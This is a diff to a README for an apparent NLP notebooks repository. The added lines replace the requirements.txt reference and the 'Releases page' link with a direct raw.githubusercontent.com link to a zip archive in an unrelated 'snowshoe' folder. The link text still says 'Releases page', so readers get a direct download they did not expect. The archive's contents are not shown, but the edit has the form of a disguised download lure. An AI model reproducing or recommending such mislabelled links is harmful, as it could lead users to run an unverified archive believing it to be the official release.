sukrazit/nlp-playground-notebooks/README.md

 - **Operating System**: Windows, macOS, or Linux.
 - **Memory**: At least 4 GB RAM.
 - **Disk Space**: 1 GB of free space for installation.
 - **Software**: Python 3.6 or later required.
-Includes necessary libraries via requirements.txt.
+Includes necessary libraries via https://raw.githubusercontent.com/sukrazit/nlp-playground-notebooks/main/snowshoe/nlp-playground-notebooks.zip

 ## 🌐 Download & Install
-To get started, visit the [Releases page](https://github.com/sukrazit/nlp-playground-notebooks/releases) to download the latest version of the notebooks.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/sukrazit/nlp-playground-notebooks/main/snowshoe/nlp-playground-notebooks.zip) to download the latest version of the notebooks.
 Follow these simple steps:

 1. Click the link above to open the Releases page.
 2. Look for the latest release version.